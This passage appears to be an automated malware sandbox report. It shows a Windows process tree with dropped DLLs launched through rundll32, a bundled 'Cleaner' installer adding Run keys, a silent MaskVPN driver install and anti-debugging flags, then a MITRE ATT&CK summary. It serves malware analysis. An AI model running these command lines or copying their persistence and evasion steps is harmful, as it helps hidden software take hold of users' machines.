                                                                                                                                                                                                                                                PID:1484
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:5348
                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:7064
                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  PID:7788
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 66DDB5723DC274A3829B4383CFD2B4EB C
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:5336
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding E56846B4E51C41B37537A882671C319B
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:584
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding C26F95FC6ADFAA60105D177B240C4B7D C
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:6792
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding 052A88B34C730AD69F21A91C9576898D C
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                    PID:8760
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                    PID:1572
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                      PID:9056
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                        PID:6356
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x200,0x204,0x208,0x1dc,0x20c,0x7ff87ef6dec0,0x7ff87ef6ded0,0x7ff87ef6dee0
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:6700
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2468 /prefetch:1
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                            PID:8820
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2556 /prefetch:1
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                            PID:4376
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --mojo-platform-channel-handle=1920 /prefetch:8
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:4548
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --mojo-platform-channel-handle=1908 /prefetch:8
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:8552
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1848 /prefetch:2
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:5692
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --mojo-platform-channel-handle=3168 /prefetch:8
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:5620
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3220 /prefetch:2
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:5400
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --mojo-platform-channel-handle=3240 /prefetch:8
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:1128
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --mojo-platform-channel-handle=3716 /prefetch:8
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:8776
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --mojo-platform-channel-handle=1996 /prefetch:8
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:4884
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1832,10858307240568412029,10831856194324467395,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6356_819081162" --mojo-platform-channel-handle=1988 /prefetch:8
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:4968
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D99F.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                          PID:8868
                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                      PID:996
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        PID:4512
                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                      PID:8308
                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:8396
                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                        PID:6412
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          PID:7580
                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                        PID:8660
                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                          DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2f959420-1c54-6b44-aa26-09724f64935f}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                          PID:3264
                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                          DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                          PID:2520
                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5140
                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:8572
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\706B.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\706B.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                            PID:5396
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:8236
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            PID:6252
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            PID:2140
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:8736
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                            PID:1332
                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                            PID:2968
                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:4240
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:5248
                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                              PID:3220
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:9112
                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                              PID:7540
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                              PID:4436
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:9264
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:9824
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:9984
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:10172
                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                              PID:10136

                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1060

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                            Software Discovery

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1518

                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                            T1497

